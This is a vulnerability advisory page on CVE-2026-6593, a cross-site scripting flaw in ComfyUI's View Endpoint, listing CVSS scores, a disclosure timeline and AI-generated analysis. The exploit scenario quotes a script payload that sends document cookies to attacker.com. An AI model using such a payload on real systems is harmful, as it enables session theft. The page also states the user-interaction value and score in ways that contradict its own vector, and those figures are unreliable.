
ComfyUI CVE-2026-6593

EUVD-2026-23739 · LOW
Cross-site Scripting (XSS) (CWE-79)
2026-04-20 · VulDB · GHSA-643x-95vv-2wf6
CVSS 4.0 score: 2.0 (NVD)

Severity by source

NVD (primary): 2.0 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: P (Passive)
Scope: X (not defined)

Lifecycle Timeline

Apr 29, 2026 01:12 (NVD): Severity changed, MEDIUM → LOW
Apr 29, 2026 01:12 (NVD): CVSS changed, 5.1 (MEDIUM) → 2.0 (LOW)
Apr 29, 2026 01:00 (vuln.today): PoC detected, public exploit code
Apr 20, 2026 02:22 (NVD): Severity changed, LOW → MEDIUM
Apr 20, 2026 02:22 (NVD): CVSS changed, 3.5 (LOW) → 5.1 (MEDIUM)
Apr 20, 2026 02:04 (vuln.today): Analysis generated
Apr 20, 2026 02:00 (euvd): EUVD ID assigned, EUVD-2026-23739
Apr 20, 2026 02:00 (vuln.today): Analysis generated
Apr 20, 2026 01:30 (nvd): CVE published, LOW 2.0

Description (CVE.org)

A vulnerability was found in ComfyUI up to 0.13.0. Affected by this issue is some unknown functionality of the file server.py of the component View Endpoint. Performing a manipulation results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

Analysis (AI)

Cross-site scripting (XSS) in ComfyUI up to version 0.13.0 allows authenticated remote attackers to inject malicious scripts through the View Endpoint in server.py, affecting user integrity with publicly available exploit code. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting its severity despite network accessibility. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Authenticate to ComfyUI
Delivery: Craft malicious View Endpoint payload
Exploit: Store or share payload
Install: Victim navigates to endpoint
C2: Browser parses unsanitized HTML
Execute: JavaScript executes in victim context
Impact: Attacker harvests session/data

Vulnerability Assessment (AI)

Exploitation: Exploitation requires: (1) authenticated access to ComfyUI (PR:L), meaning the attacker or a collaborator must hold a valid login account; (2) user interaction (UI:R), meaning the victim must click a link or view a page containing the malicious payload, either directly or by navigating to an attacker-controlled project or shared resource; (3) the View Endpoint must be enabled and accessible (the typical default configuration); (4) the victim's browser must execute JavaScript (no browser extensions or protections disabling scripts). …

Risk Assessment: Despite the low CVSS score of 3.5, this vulnerability carries moderate practical risk due to public exploit availability and the authenticated-access requirement. …

Exploit Scenario: An authenticated ComfyUI user logs into a shared ComfyUI instance. The attacker crafts a malicious URL or parameter containing JavaScript code (e.g., by manipulating the View Endpoint with a payload like <script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>) and shares it via social engineering or stores it in a project file. …

Remediation: No vendor-released patch has been identified at the time of analysis, as ComfyUI's maintainers did not respond to early disclosure. …


CVE-2026-6593 vulnerability details – vuln.today
